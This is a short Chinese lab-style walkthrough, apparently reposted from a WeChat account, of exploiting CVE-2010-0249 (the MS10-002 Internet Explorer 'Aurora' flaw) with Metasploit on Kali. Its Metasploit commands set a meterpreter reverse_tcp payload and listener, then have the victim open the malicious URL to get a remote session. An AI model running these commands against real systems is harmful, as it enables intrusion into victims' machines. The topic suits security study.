漏洞利用
kali打开msf,搜索MS10-002的漏洞利用模块后进入
exploit/windows/browser/ms10_002_aurora模块。
设置并查看参数
set payload windows/meterpreter/reverse_tcp
set srvhost 192.168.1.70
set srvport 7070
show options
参数设置没问题后输入run执行,复制URL发给目标。
用IE打开URL返回kali查看结果
kali已经成功和目标服务器创建一个会话,查看文件及权限。
利用成功,可以返回当前用户信息
注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。
推荐文章++++
本文始发于微信公众号(黑白之道):CVE-2010-0249 简单利用
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论